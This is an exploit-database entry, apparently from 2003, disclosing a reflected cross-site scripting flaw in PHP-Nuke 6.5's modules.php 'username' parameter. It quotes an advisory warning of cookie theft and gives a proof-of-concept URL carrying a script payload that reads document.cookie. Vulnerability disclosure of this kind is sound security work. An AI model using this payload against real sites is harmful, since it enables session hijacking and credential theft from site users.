PHP-Nuke 6.5 - 'modules.php?Username' Cross-Site Scripting
| EKU-ID: 28071 | CVE: | OSVDB-ID: |
| Author: Ferruh Mavituna | Published: 2003-05-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28071 | CVE: | OSVDB-ID: |
| Author: Ferruh Mavituna | Published: 2003-05-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7570/info A cross site scripting vulnerability has been reported for PHP-Nuke. Specifically, PHP-Nuke does not sufficiently sanitize user-supplied input for the 'username' URI parameter to the modules.php script. This may allow for theft of cookie-based authentication credentials and other attacks. http://[victim]/modules.php?name=Your_Account&op=userinfo& username=bla<script>alert(document.cookie)</script>